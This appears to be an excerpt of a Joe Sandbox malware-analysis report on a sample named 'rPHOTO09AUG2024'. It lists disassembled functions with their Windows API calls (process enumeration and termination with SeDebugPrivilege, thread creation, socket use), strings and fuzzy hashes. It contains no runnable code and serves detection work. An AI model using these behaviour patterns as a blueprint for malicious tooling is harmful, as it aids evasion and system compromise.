Opcode Fuzzy Hash: 06fc885601c69690babc291e7ecf9c75cbadd7fc38b4b7eef12cd1345b1531ea
Instruction Fuzzy Hash: 5911E17165031ABEFB106B64DC89FAA7B2EEB4C755F110429F284AB1A0C9F35C10DAB4

Function 00D98E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00D98A84,00000B00,?,?), ref: 00D98E0C
HeapAlloc.KERNEL32(00000000,?,00D98A84,00000B00,?,?), ref: 00D98E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00D98A84,00000B00,?,?), ref: 00D98E28
GetCurrentProcess.KERNEL32(?,00000000,?,00D98A84,00000B00,?,?), ref: 00D98E30
DuplicateHandle.KERNEL32(00000000,?,00D98A84,00000B00,?,?), ref: 00D98E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00D98A84,00000B00,?,?), ref: 00D98E43
GetCurrentProcess.KERNEL32(00D98A84,00000000,?,00D98A84,00000B00,?,?), ref: 00D98E4B
DuplicateHandle.KERNEL32(00000000,?,00D98A84,00000B00,?,?), ref: 00D98E4E
CreateThread.KERNEL32(00000000,00000000,00D98E74,00000000,00000000,00000000), ref: 00D98E68

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 7dd8147a5ace6c2cef208ae35ad6ddd3bf2ba8d751e0e0a11f2ff7222de39068
Instruction ID: 75340a0125b28aa3cb9eab45ec15a71d8ca19495b91bc14929a0883b9dc340f4
Opcode Fuzzy Hash: 7dd8147a5ace6c2cef208ae35ad6ddd3bf2ba8d751e0e0a11f2ff7222de39068
Instruction Fuzzy Hash: 1101BBB5640309FFE710ABA5DC4DFAB7BADEB89711F044421FA05DB2A1CA719800CB30

Function 00DB9428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DB947C
VariantInit.OLEAUT32(?), ref: 00DB954D
VariantInit.OLEAUT32(?), ref: 00DB964E
VariantClear.OLEAUT32(?), ref: 00DB9658
VariantClear.OLEAUT32(?), ref: 00DB96B5

Strings

Null Object assignment in FOR..IN loop, xrefs: 00DB94DD, 00DB960B, 00DB96C3
Incorrect Object type in FOR..IN loop, xrefs: 00DB9631

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 7fdb4155f5b3d5ec117c4ff5a01f4e6f2663ba05ee5693c9e4241c21a0e51861
Instruction ID: 571ffe66a01b60daa19d3b65811668d7bbdd4ba8db4a593f77fd553165ab61ba
Opcode Fuzzy Hash: 7fdb4155f5b3d5ec117c4ff5a01f4e6f2663ba05ee5693c9e4241c21a0e51861
Instruction Fuzzy Hash: 86919B70A00259EBDF24DFA5C868FEEBBB8EF45710F148159E616AB280D7709905CFB0

Function 00DB9A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00D97652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D9758C,80070057,?,?,?,00D9799D), ref: 00D9766F
Part of subcall function 00D97652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D9758C,80070057,?,?), ref: 00D9768A
Part of subcall function 00D97652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D9758C,80070057,?,?), ref: 00D97698
Part of subcall function 00D97652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D9758C,80070057,?), ref: 00D976A8

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00DB9B1B
_memset.LIBCMT ref: 00DB9B28
_memset.LIBCMT ref: 00DB9C6B
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00DB9C97
CoTaskMemFree.OLE32(?), ref: 00DB9CA2

Strings

NULL Pointer assignment, xrefs: 00DB9CF0

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: af704808bd53d0a36965638aae3aedadab1b8b486f3b705707f1cd2e26e616a7
Instruction ID: 5211ef4dd7781ae4bf374dd39ff7abe639def2fd43c64b5e8c55cdfcbc2585a6
Opcode Fuzzy Hash: af704808bd53d0a36965638aae3aedadab1b8b486f3b705707f1cd2e26e616a7
Instruction Fuzzy Hash: F3910871D00229EBDB10DFA5DC95ADEBBB9EF08710F20415AF519A7281DB71AA44CFB0

Function 00DC6FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00DC7093
SendMessageW.USER32(?,00001036,00000000,?), ref: 00DC70A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00DC70C1
_wcscat.LIBCMT ref: 00DC711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 00DC7133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00DC7161

Strings

SysListView32, xrefs: 00DC7065

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 18e224bea32c88af68b57619f0480fd135173e8d2382b975d78f57cfacd42286
Instruction ID: 2f63e8459d9ddab38f3db952dbd1ec62195ff6a26f00af2eaae022f30c39ca3b
Opcode Fuzzy Hash: 18e224bea32c88af68b57619f0480fd135173e8d2382b975d78f57cfacd42286
Instruction Fuzzy Hash: F8419E70A0430AAFDB219FA4CC85FEA77B9EF08350F14452EF584E7292D6729D849B70

Function 00DBEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00DA3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00DA3EB6
Part of subcall function 00DA3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00DA3EC4
Part of subcall function 00DA3E91: CloseHandle.KERNEL32(00000000), ref: 00DA3F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DBECB8
GetLastError.KERNEL32 ref: 00DBECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DBECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 00DBED77
GetLastError.KERNEL32(00000000), ref: 00DBED82
CloseHandle.KERNEL32(00000000), ref: 00DBEDB7

Strings

SeDebugPrivilege, xrefs: 00DBECD6

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: ed6ea41af2f5c7c627acb2785737fb4f2826245a79fc902f46ee25487f20fa3b
Instruction ID: 8b965764924eaf1e9f079d4fdd3b7b4502b3b240d48604a37a49614e76da3175
Opcode Fuzzy Hash: ed6ea41af2f5c7c627acb2785737fb4f2826245a79fc902f46ee25487f20fa3b
Instruction Fuzzy Hash: EB416C712002019FDB14EF25C896FAEB7A6EF80714F188459F9429B3D2DBB5E804CBB5

Function 00DA3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00DA32C5

Strings

info, xrefs: 00DA3266
blank, xrefs: 00DA3247
stop, xrefs: 00DA3296
question, xrefs: 00DA327E
warning, xrefs: 00DA32AE

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 462a48504f01ec7e20db36da7246269205dfa2b6ae1b67ca628de0bf0ec1012b
Instruction ID: e36b16f9c1e1c596dc7c2152d607ed4ee5aed5676f4b55ba1d3bc65510ddf1b6
Opcode Fuzzy Hash: 462a48504f01ec7e20db36da7246269205dfa2b6ae1b67ca628de0bf0ec1012b
Instruction Fuzzy Hash: FC11E73160874ABFA7055B58DC43EAAB79DDF1B370F20402AF904A6281E765AB4046BD

Function 00DA4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00DA454E
LoadStringW.USER32(00000000), ref: 00DA4555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00DA456B
LoadStringW.USER32(00000000), ref: 00DA4572
_wprintf.LIBCMT ref: 00DA4598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DA45B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00DA4593

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: ea581e0d1b15d7aaf1ef94a2e10b9d4b7d65612dfe8db75d25e5a134cca23a4c
Instruction ID: e6818460c84528d818b5a1077983830e1ad0d0dc9a9f8ae524a735caa8a8539f
Opcode Fuzzy Hash: ea581e0d1b15d7aaf1ef94a2e10b9d4b7d65612dfe8db75d25e5a134cca23a4c
Instruction Fuzzy Hash: 950162F2940309BFE710A7A4DD89EFB776DD708301F0005A5BB45D2151EA749E858F74

Function 00DCD74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623

GetSystemMetrics.USER32(0000000F), ref: 00DCD78A
GetSystemMetrics.USER32(0000000F), ref: 00DCD7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00DCD9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00DCDA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00DCDA24
ShowWindow.USER32(00000003,00000000), ref: 00DCDA43
InvalidateRect.USER32(?,00000000,00000001), ref: 00DCDA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 00DCDA8B

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: dd7187c3f67941e9234b395655b2341e6bb75cc13baae32eb91624b0c25d0671
Instruction ID: 0f6f314dd0c2af42323c64677a1750920a10415b6aadb630e4cdd0ba38304c1e
Opcode Fuzzy Hash: dd7187c3f67941e9234b395655b2341e6bb75cc13baae32eb91624b0c25d0671
Instruction Fuzzy Hash: 06B17A75500216AFDF14CF69C985BBD7BB2FF48701F088179EC489B295DB34A950CB60

Function 00D42A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00D7C417,00000004,00000000,00000000,00000000), ref: 00D42ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00D7C417,00000004,00000000,00000000,00000000,000000FF), ref: 00D42B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00D7C417,00000004,00000000,00000000,00000000), ref: 00D7C46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00D7C417,00000004,00000000,00000000,00000000), ref: 00D7C4D6

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 82297e790ad0de040d4301f3da6b987f1a57b6f87fd248ba38d0e8ac41564b1e
Instruction ID: 902b50841e31c9e6d804cf7c7746c418c4e53a59889b7680789eec6ff543048c
Opcode Fuzzy Hash: 82297e790ad0de040d4301f3da6b987f1a57b6f87fd248ba38d0e8ac41564b1e
Instruction Fuzzy Hash: E34139302147819FC7358B288C9EB7A7BA2EB85314F9CC81DF48B96660C675E885D730

Function 00DA7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00DA737F

Part of subcall function 00D60FF6: std::exception::exception.LIBCMT ref: 00D6102C
Part of subcall function 00D60FF6: __CxxThrowException@8.LIBCMT ref: 00D61041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00DA73B6
EnterCriticalSection.KERNEL32(?), ref: 00DA73D2
_memmove.LIBCMT ref: 00DA7420
_memmove.LIBCMT ref: 00DA743D
LeaveCriticalSection.KERNEL32(?), ref: 00DA744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00DA7461
InterlockedExchange.KERNEL32(?,000001F6), ref: 00DA7480

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 0c10ed1752961a2f958e2299ad2940c11afbbf7616bc2d82d06666bb2c6353d9
Instruction ID: 0ca6afb05542d54a3edb2a1ab2a023b0246a580863c8e32746e20dc43c5ed13e
Opcode Fuzzy Hash: 0c10ed1752961a2f958e2299ad2940c11afbbf7616bc2d82d06666bb2c6353d9
Instruction Fuzzy Hash: 43316D75904206EBCF10DFA4DC85EAFBBB8EF49710B1841A5F904EB246DB709A14CBB4

Function 00DC6442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00DC645A
GetDC.USER32(00000000), ref: 00DC6462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DC646D
ReleaseDC.USER32(00000000,00000000), ref: 00DC6479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00DC64B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00DC64C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00DC9299,?,?,000000FF,00000000,?,000000FF,?), ref: 00DC6500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00DC6520

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 1e86cb6c7b28c95470200a3e1dfcba470fa5c79f27aa06292704b04962843f94
Instruction ID: 2f923534920cff05f7f45b61fb9c797a2d7e3ad4f0e83ef141f5dd1ef5a6048c
Opcode Fuzzy Hash: 1e86cb6c7b28c95470200a3e1dfcba470fa5c79f27aa06292704b04962843f94
Instruction Fuzzy Hash: EA316D72251216BFEB118F50CC4AFEA3FAAEF09761F084065FE08DA295D6759841CB74

Function 00D9C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00D9C087
_memcmp.LIBCMT ref: 00D9C0A9
_memcmp.LIBCMT ref: 00D9C0C1
_memcmp.LIBCMT ref: 00D9C0D4
_memcmp.LIBCMT ref: 00D9C0EE
_memcmp.LIBCMT ref: 00D9C101
_memcmp.LIBCMT ref: 00D9C119
_memcmp.LIBCMT ref: 00D9C134

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 43273c928bf8962666441aef29f6bb836bb5f32a417d56e7244e1f7a5d914451
Instruction ID: 1c08caf080629824b4644d953988ee73e8f0609c0e47d0822471dff7764db317
Opcode Fuzzy Hash: 43273c928bf8962666441aef29f6bb836bb5f32a417d56e7244e1f7a5d914451
Instruction Fuzzy Hash: 75219F69661205BBEB14B5618D46FBB239DEF203A4F0C5021FD09A6382E791DE1582B5

Function 00DAED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00D49997: __itow.LIBCMT ref: 00D499C2
Part of subcall function 00D49997: __swprintf.LIBCMT ref: 00D49A0C

Part of subcall function 00D5FEC6: _wcscpy.LIBCMT ref: 00D5FEE9

_wcstok.LIBCMT ref: 00DAEEFF
_wcscpy.LIBCMT ref: 00DAEF8E
_memset.LIBCMT ref: 00DAEFC1

Strings

X, xrefs: 00DAEFFE

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 3f33630ab416b5d6ea4b089236d387a4a62fff2f28c7512b0124e9a185522283
Instruction ID: 89d1519cdc3a18f4b16336b4a2d11cb32e15509e96709820b034f15938ccac19
Opcode Fuzzy Hash: 3f33630ab416b5d6ea4b089236d387a4a62fff2f28c7512b0124e9a185522283
Instruction Fuzzy Hash: 3EC15C715083419FC724EF64C895A6AB7E4FF85310F04496DF8999B2A2DB30ED45CBB2

Function 00DB6E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00DB6F14
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00DB6F35
WSAGetLastError.WSOCK32(00000000), ref: 00DB6F48
htons.WSOCK32(?,?,?,00000000,?), ref: 00DB6FFE
inet_ntoa.WSOCK32(?), ref: 00DB6FBB

Part of subcall function 00D9AE14: _strlen.LIBCMT ref: 00D9AE1E
Part of subcall function 00D9AE14: _memmove.LIBCMT ref: 00D9AE40

_strlen.LIBCMT ref: 00DB7058
_memmove.LIBCMT ref: 00DB70C1

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: d3f81c16f44c5c627172c16ec6271a71a5555f488112ee5193c132e8bba34b7d
Instruction ID: 0d86c6aaf359603cb85e39a3748e9078e026009a843f209c0acc6cfaa72f46aa
Opcode Fuzzy Hash: d3f81c16f44c5c627172c16ec6271a71a5555f488112ee5193c132e8bba34b7d
Instruction Fuzzy Hash: 6381AF71508300EBD710EB24CC96EABB7A9EF84714F148919F5569B292DA71ED04CBB2

Function 00D41424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a14041415dbfafa4a9008e367e31070e420baeb9c7f88adf2fe498b1b1be7e3d
Instruction ID: b662ebbfd79703e9224c3cc98ea378c373527b66ff98b3cfa7e4a3f877930ab2
Opcode Fuzzy Hash: a14041415dbfafa4a9008e367e31070e420baeb9c7f88adf2fe498b1b1be7e3d
